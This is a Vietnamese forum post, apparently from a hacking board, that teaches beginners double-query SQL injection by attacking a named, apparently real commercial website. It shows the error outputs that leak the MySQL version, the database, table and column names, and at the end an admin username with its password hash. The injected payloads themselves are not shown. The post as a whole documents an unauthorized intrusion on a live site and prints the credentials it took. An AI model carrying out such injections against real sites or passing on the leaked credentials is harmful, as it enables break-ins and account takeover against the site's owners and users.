Double query based sql injection

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 9, 2017.

  1. Mickey

    Mickey Hacking For Hacker Staff Member

    Mình viết cho newbie thôi nhé
    có bạn đã ra chủ đề là khai thác
    DOUBLE QUERY BASED SQL INJECTION

    sau đây mình xin giải đáp
    http://cachnhiet.com.vn/product.php?icatid=56

    bắt đầu khai thác nhé
    Get the MySQL Version.
    HTML:
    Duplicate entry '5.0.45-community-nt:1' for key 1
    Get Database
    HTML:
    Duplicate entry '[email protected]%1' for key 1
    Get Table
    HTML:
    sử dụng limit
    cho đến khi nào ra tabla user thì thôi
    HTML:
    Duplicate entry 'user1' for key 1
    chuyển user thành hex
    Get the Column Names
    HTML:
    tiếp tục sử dụng limit
    HTML:
    Duplicate entry 'sUserName~1' for key 1
    HTML:
    Duplicate entry 'sPassword~1' for key 1
    ok múc thôi,sao phải xoắn

    HTML:
    Duplicate entry 'admin:a1da25145adb384737b222aa2d002ad51' for key 1
     

Share This Page